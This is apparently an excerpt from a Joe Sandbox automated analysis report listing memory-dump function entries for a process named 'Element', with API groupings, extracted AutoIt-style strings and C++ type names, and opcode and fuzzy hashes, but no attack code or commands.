                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8f6d893820d0fab81262624eeca4fcab017bbf27f8cb14a3bd45f903649d3583
                    • Instruction ID: 3c2465243e1097111b6f35626b7e31f5ee0f537208d4b210687f972e527fbf73
                    • Opcode Fuzzy Hash: 8f6d893820d0fab81262624eeca4fcab017bbf27f8cb14a3bd45f903649d3583
                    • Instruction Fuzzy Hash: EEA0012191A85AD4E6449F01AC590612260AB50B16B854471E09D950A69F3CA8548344

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                    • API String ID: 2943138195-1482988683
                    • Opcode ID: bf9c44b2e97561f35a32cc1340e6c42fb4d1cfa284a7476b3b5f661ab105efb4
                    • Instruction ID: a0be5232fa5f5e9febb07adeb7817e5814f55776be38e9ad724c82444ac83215
                    • Opcode Fuzzy Hash: bf9c44b2e97561f35a32cc1340e6c42fb4d1cfa284a7476b3b5f661ab105efb4
                    • Instruction Fuzzy Hash: 35026E72B10A10B8FB65DB68D8BC3ED27B0BB25744F504919CE4957AB8EB35C9C6CB40

                    Control-flow Graph

                    (control-flow graph for the function at 7ff6c591f0c0; the rendered graph and its executed / not-executed colouring are not recoverable from the page. Basic blocks in the edge data reference these APIs: SetTextColor, GetSysColor, GetSysColorBrush, CreateSolidBrush, SetBkColor, SelectObject, InflateRect, FrameRect, DeleteObject, DrawFrameControl, FillRect, GetWindowLongW, SendMessageW, GetWindowTextW, DrawTextW, DrawFocusRect)
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                    • String ID:
                    • API String ID: 3521893082-0
                    • Opcode ID: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                    • Instruction ID: 3ef88be5f94f628e168b46d71480984f66060d1782b04d2e7c8cff494b70ab62
                    • Opcode Fuzzy Hash: f6b3e33df0b6fd49e851f84cb0d7e1a0081305ee093791da2a064367007aa246
                    • Instruction Fuzzy Hash: D1A1A026F08A9286EB148F61DD4957D27A1BB48F76F104630DEAA8AB96DF3C98448740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                    • Instruction ID: f04f8451161760265ab5175b457b943a95f9fa455b2c63c7ac15dcc8b5ffcf89
                    • Opcode Fuzzy Hash: e7723dbef953c17b05f3a04d1756e8a1bd39c10ad02639bf65342523599ff9cc
                    • Instruction Fuzzy Hash: 29717236A08A9586E7149F11ED4867A73A1FB89FB2F004274DD9E87BD6DF3CD8458B00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Color$LongWindow$ModeObjectStockText
                    • String ID:
                    • API String ID: 554392163-0
                    • Opcode ID: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                    • Instruction ID: 9156be251e9b9dc3c04b1d4a7e03144cea257e07c174c95d5207a6918574304d
                    • Opcode Fuzzy Hash: cc65a1f5085739bdf730f5a57d68a81d83072d1dd34cd411bf68f0558776c384
                    • Instruction Fuzzy Hash: 1A81D721E0D6A381EA709F299C4867D2395EF45FA2F550231D9DF876E5DF3CAC428740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+$Replicator::operator[]
                    • String ID: `anonymous namespace'
                    • API String ID: 3863519203-3062148218
                    • Opcode ID: ecac5bda029f4e8b39351dcf81bee64cf9ec5b6670d11ee5966aacbfeb8e7bc0
                    • Instruction ID: d41aadf69cfeef5affcba74928f565375a78a0fd9d9e3984e64c587116e42559
                    • Opcode Fuzzy Hash: ecac5bda029f4e8b39351dcf81bee64cf9ec5b6670d11ee5966aacbfeb8e7bc0
                    • Instruction Fuzzy Hash: F2E1AC72604B86B9FB10DF24E8B82DD77A0F364784F948116DF8957B65DB38C696CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 2091158083-3440237614
                    • Opcode ID: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
                    • Instruction ID: 6818ea1d5d3ccaf2012eef2b0a4b0f2f80f1bc4ba767d3ecbd24c1152b8e4048
                    • Opcode Fuzzy Hash: a6383f7ad2c15784484526503c134a2164f43bfe7e3a3a9e6e3dd31a7eae073a
                    • Instruction Fuzzy Hash: 7871A436618A8296E710DF25EC547ED7320FB84F95F800032EA8E87A9ADF7CD949C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                    • String ID: .dll$.exe$.icl
                    • API String ID: 258715311-1154884017
                    • Opcode ID: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
                    • Instruction ID: 22b72deabdcd23986c8baaa707566814ea5d70333d281ca5c7297f4d4657d36d
                    • Opcode Fuzzy Hash: 6a1298940e1642c5f8eac90391968d97117fa4591b4f58ce6483caa2bbefa5f3
                    • Instruction Fuzzy Hash: 1971A532A09BA286EB609F219C4867D76A4FB44FA6F440235DD9E87796DF3CDC44C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
                    • String ID:
                    • API String ID: 2779716855-0
                    • Opcode ID: 5ce09494ab24ac1ed07fa16ca7819eb05e9d682ed7dc52cd5bd0682f6ced3240
                    • Instruction ID: 0af35abae289b56ffd9c06712470accbff8a84ade109f300fe0aa7522012fac7
                    • Opcode Fuzzy Hash: 5ce09494ab24ac1ed07fa16ca7819eb05e9d682ed7dc52cd5bd0682f6ced3240
                    • Instruction Fuzzy Hash: A0515636B04B9186EB14DF62EC48A6933A4FB88F9AB504175DE9E83B16DF3DD845C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                    • API String ID: 0-3931177956
                    • Opcode ID: 38560f2f3fa774d15aa6a8c65f2969727263349bd26c7da2756ce7c29d18a3b4
                    • Instruction ID: 27b0841e4bf4dd7384b89e09533299f038eccb96e91a6cca1f219172cbc50242
                    • Opcode Fuzzy Hash: 38560f2f3fa774d15aa6a8c65f2969727263349bd26c7da2756ce7c29d18a3b4
                    • Instruction Fuzzy Hash: D1027036B0A662C5FA589F65C99417C73A0FF88F42F054639DA8E87A95EF2CED51C300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: NameName::$Name::operator+swprintf
                    • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                    • API String ID: 130963256-2441609178
                    • Opcode ID: 68a10bf44facf0b84ae4eb96ffe9e34ed4b53e78bd9f6bd738c2bc92d30197c4
                    • Instruction ID: a5ce8c97a7d624b6926e488f44aa5090f169d67f3b2876b87517030d3e289f5d
                    • Opcode Fuzzy Hash: 68a10bf44facf0b84ae4eb96ffe9e34ed4b53e78bd9f6bd738c2bc92d30197c4
                    • Instruction Fuzzy Hash: 87F18C32A00650B4FB14AB74C9BD3FC27A0B775748F844525CE4A6BADADA388DCBC745
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: NULL Pointer assignment
                    • API String ID: 0-2785691316
                    • Opcode ID: 3cbbc719979583f5783d410f4d2771c0b32c38c29e3e03eccb0298c3601c94f3
                    • Instruction ID: c52d8405b5119d088009a35e2996eb3a6f608101a8a5b3321322f0448d49b122
                    • Opcode Fuzzy Hash: 3cbbc719979583f5783d410f4d2771c0b32c38c29e3e03eccb0298c3601c94f3
                    • Instruction Fuzzy Hash: 6A516132B15A628AEB40DF21DC956BC37B0FB84F8AF404036EA4E8765ADF78D845C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID:
                    • API String ID: 2943138195-0
                    • Opcode ID: bc6cb8b7535270329f35c7015d40d1d74eab41d12f7730732c60380f60136060
                    • Instruction ID: 4ed4841fd5d9a962f3a9f33d753a1b9ed47a9b4d9650f72aee3c5d7b04845e7a
                    • Opcode Fuzzy Hash: bc6cb8b7535270329f35c7015d40d1d74eab41d12f7730732c60380f60136060
                    • Instruction Fuzzy Hash: 46F15A76B00A85BAFB10EF74E4B82EC37B5E32474CF444416EE4967B99DA34C59ACB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                    • String ID: P
                    • API String ID: 1460738036-3110715001
                    • Opcode ID: bc901e50a334b4a7c78d094858a5c527965ee132f71a92aa0f5dc32a9aa332c1
                    • Instruction ID: b35421c0a8836c8e24780628c90783ae4b271fed97b5d0ce0b2cbfba1d643552
                    • Opcode Fuzzy Hash: bc901e50a334b4a7c78d094858a5c527965ee132f71a92aa0f5dc32a9aa332c1
                    • Instruction Fuzzy Hash: 1D71E529A0969246F710DF259C582BD2772FB82F4AF544431DACE97682DFBCED45C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: LoadStringwprintf
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                    • API String ID: 3297454147-3080491070
                    • Opcode ID: b1c87d20e2fab5ea52848e67197744439dd02fd7dad917650ee75d30fdaea2ed
                    • Instruction ID: 4d07b34204343d595a29e84828ab44286fe8c0ddb852313e9471ce3b2c1ac13b
                    • Opcode Fuzzy Hash: b1c87d20e2fab5ea52848e67197744439dd02fd7dad917650ee75d30fdaea2ed
                    • Instruction Fuzzy Hash: 6F614261B296A292EB00DF24EC415ED6361FF84F85F800072EA9D9769ADF7DDD09C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Messagewprintf
                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                    • API String ID: 4051287042-2268648507
                    • Opcode ID: 62d3efdd22561061cae8cb835c91bde9e20e159738d326f93298747da2c55c00
                    • Instruction ID: bb0fe59ee1eab87cec1c97905534e107a7c43a2c9870261427a9c02df38fda54
                    • Opcode Fuzzy Hash: 62d3efdd22561061cae8cb835c91bde9e20e159738d326f93298747da2c55c00
                    • Instruction Fuzzy Hash: 43516E21B19AA291EB00EF64EC414AD6321FF80F95B801072F99DD769ADF7CDD0AC740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Destroy$AcceleratorKillTableTimerWindow
                    • String ID:
                    • API String ID: 1974058525-0
                    • Opcode ID: c5a335280972faf6a49444eab98031eca0eed2acb66a1a220016335a9642b9bc
                    • Instruction ID: 28b08c566ba012cc6c715eeb6b01807a0259f32f062840089341c708192dd43c
                    • Opcode Fuzzy Hash: c5a335280972faf6a49444eab98031eca0eed2acb66a1a220016335a9642b9bc
                    • Instruction Fuzzy Hash: F3917965B0AA6281EB649F15DC9067823A4BF84FC6F584131D98ECBB96DF3CEC448340
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Value$ErrorLast$Heap$AllocFree
                    • String ID:
                    • API String ID: 570795689-0
                    • Opcode ID: 7ca9191cd13b9db17badb20b25dfeb4c5e022c4763dc3fa71fc307bea22fa67d
                    • Instruction ID: 323f85995a95bc167363a6e7e6e6ac25ee967a870d27ab79b4b238226781cb87
                    • Opcode Fuzzy Hash: 7ca9191cd13b9db17badb20b25dfeb4c5e022c4763dc3fa71fc307bea22fa67d
                    • Instruction Fuzzy Hash: F4417EB830021062FA68A775597D3EE22C29B747F4F580B29AE36077D6EE78C4D3C201
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                    • String ID: P
                    • API String ID: 1268354404-3110715001
                    • Opcode ID: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                    • Instruction ID: acb2b1a245d9fb11b4ad14b39fc8fa347c08b7f11bdbfbcb4aac19d907c86003
                    • Opcode Fuzzy Hash: 65985f514fe282cf7fc84508a366ad01552345b2107e3be222cdfd0a1f15b60d
                    • Instruction Fuzzy Hash: F561DF35B0A6528AEB249F25DC5067927A1FB88FD9F140135ED8EC7B95DF3CE8408740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: LoadStringwprintf
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 3297454147-2391861430
                    • Opcode ID: 4b4e83561d4c394d035cfda00e0b77968df2470a98dc572cfda11644b6d54e6e
                    • Instruction ID: 85c8cfd63a35342863dcae0f3c549341b2db9ec2face51fb3a1c8d01d38c9690
                    • Opcode Fuzzy Hash: 4b4e83561d4c394d035cfda00e0b77968df2470a98dc572cfda11644b6d54e6e
                    • Instruction Fuzzy Hash: A6717122B1A6A292EB40DF65EC404ED6361FB84F95F800032EA9D87696DF7DED09C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                    • String ID: static
                    • API String ID: 3821898125-2160076837
                    • Opcode ID: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                    • Instruction ID: c186670862070467636b0a414c7977455ea8787ee9709229a79b621b52b11fdf
                    • Opcode Fuzzy Hash: c03bc4cbd0e80d437ddc16db197f3997b0fadd0aa29a366dc6835b7237bf8b41
                    • Instruction Fuzzy Hash: EC4131366087C186E7608F25E84475A7361FB89BA1F544275DA9D87BAACF3CD845CF00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID:
                    • API String ID: 2943138195-0
                    • Opcode ID: 9109b6d0126946025e8414f8d366ecfb20393bfba6ac2532a434fca34c3f25d5
                    • Instruction ID: 945abb1a6660bd7cc9a57497e91402bd63e965118a84003e37afae1be011769e
                    • Opcode Fuzzy Hash: 9109b6d0126946025e8414f8d366ecfb20393bfba6ac2532a434fca34c3f25d5
                    • Instruction Fuzzy Hash: CD716D72710A41BAFB11EF65D4742EC33B1E764B8CF804815DE0967A99EF30C69ACB90
                    APIs
                    Strings
                    Memory Dump Source
